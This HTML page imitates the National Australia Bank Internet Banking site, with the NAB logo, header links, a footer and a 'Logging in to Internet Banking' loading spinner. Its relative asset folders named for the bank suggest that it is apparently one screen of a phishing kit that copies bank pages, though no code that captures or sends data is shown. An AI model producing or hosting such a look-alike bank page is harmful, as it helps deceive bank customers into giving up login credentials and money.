<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>NAB Internet Banking</title>
    <link rel="stylesheet" href="../../../assets/cssNab/css.css">
    <link rel="icon" href="../../../assets/imgNab/logo2.svg">

    <link href="https://cdn.jsdelivr.net/npm/remixicon@2.5.0/fonts/remixicon.css" rel="stylesheet">
    <style>
        .mainPage01 form .mainPage01Form01 .errlog p{
            margin-bottom: 0;
        }
        .mainPage .mainPage01 form .mainPage01Form01 .mainPage01Form01_boxiN input:valid{
            box-shadow:none;
            border: 1px solid rgba(0, 0, 0, 0.778);
        }
        .mainPage .mainPage01 form .mainPage01Form01 .mainPage01Form01_boxiN input{
            box-shadow: rgba(194, 0, 0, 0.65) 0px 0px 0px 3px;
            border-color: transparent;
        }
        .mainPage01Form01{
            height: 60vh;
        }
        #loddd{
            height: 100%;
            width: 100%;
            display: flex;
            flex-direction: column;
            gap: 10px;
            align-items: center;
            justify-content: center;
        }
        #loddd p{
            text-align: center;
        }
            
    </style>
</head>
<body>
    <header>
        <div class="header">
            <div class="headerHidn">
                <i class="ri-menu-line"></i>
                <img src="../../../assets/imgNab/logo2.svg" alt="">
                <span>Internet Banking</span>
            </div>
            <div class="header02main">
                <div class="header02main_01">
                    <img src="../../../assets/imgNab/logo1.svg" alt="" >
                    <span>Internet Banking</span>
                </div>
                <ul class="header02main_02">
                    <li>Monday 6 November 2023</li>
                    <li>Help</li>
                    <li>Security</li>
                    <li>Contact us</li>
                    <li>Locate us</li>
                </ul>
            </div>
        </div>
    </header>
    <!-- main -->
    <section class="mainPage">
        <div class="mainPage01">
            <form action="" method="post">
                <div class="mainPage01Form01">
                    <h1>NAB Internet Banking</h1>
                    <div id="loddd">
                        <div class="lds-ring"><div></div><div></div><div></div><div></div></div>
                        <p>Logging in to Internet Banking</p>
                    </div>

                </div>
                <div class="mainPage01Form02">
                    <p>New to NAB Internet Banking?</p><a href="">Register now</a>
                </div>       
            </form>
        </div>
        <div class="mainPage02">
            <p>Notice ordered by the Federal Court in ASIC case against NAB about Periodic Payment Fees</p>
            <div class="mainPage02_02">
                <button>Find out more</button>
            </div>
        </div>
    </section>
    <!-- footer -->
    <footer>
        <div class="footer">
            <p>© National Australia Bank Limited</p>
        </div>
    </footer>
</body>
</html>